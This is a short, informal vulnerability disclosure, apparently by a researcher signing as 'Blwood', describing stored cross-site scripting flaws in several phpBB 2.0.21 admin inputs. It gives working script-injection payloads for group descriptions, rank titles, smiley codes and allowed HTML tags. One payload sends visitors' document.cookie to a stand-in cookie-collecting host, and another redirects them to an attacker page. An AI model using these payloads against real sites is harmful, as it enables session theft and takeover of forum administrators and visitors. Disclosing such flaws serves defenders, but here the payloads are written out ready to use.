phpBB 2.0.21 XSS in administration
//-- By Blwood [firstname.lastname@example.org] //-- [ http://www.blwood.net ] //--
Management & Create a theme
Lots of input are not properly "filtrate" like style_name, head_stylesheet, body_background, tr_color1_name (all the input in simple name)...
Input group_description is not correctly "filtrated" we can inject js like this : "><script>alert('Owned by Blwood')</script> or </textare>"><script>alert('Owned by Blwood')</script> When an admin will go in Group administration he'll be owned. But what's more, the groups can be seen in groupcp.php by every visitors. An exploit could be : </textarea>"><script>document.location='http://127.0.0.1/cookie.php?'+document.cookie</script> or </textarea>"><script>document.location='http://site.com/ownedpage.html'</script>
Rank Title (input title) is not correctly filtrated, we can inject js like : "><script>alert('xss')</script> But what's interresting, if you give this rank to an user, the rank will appear in user's topics and the code will be executed when someone sees a topic :) Now you can inject what you want but maximum 40 caracters...
Smiles Editing Utility
Smiley Code : "><body onload="alert('Owned by Blwood')">
Inputs are not correctyle filtrated : Ex : allow_html_tags => "><script>alert('Owned by Blwood')</script>
[ Video ]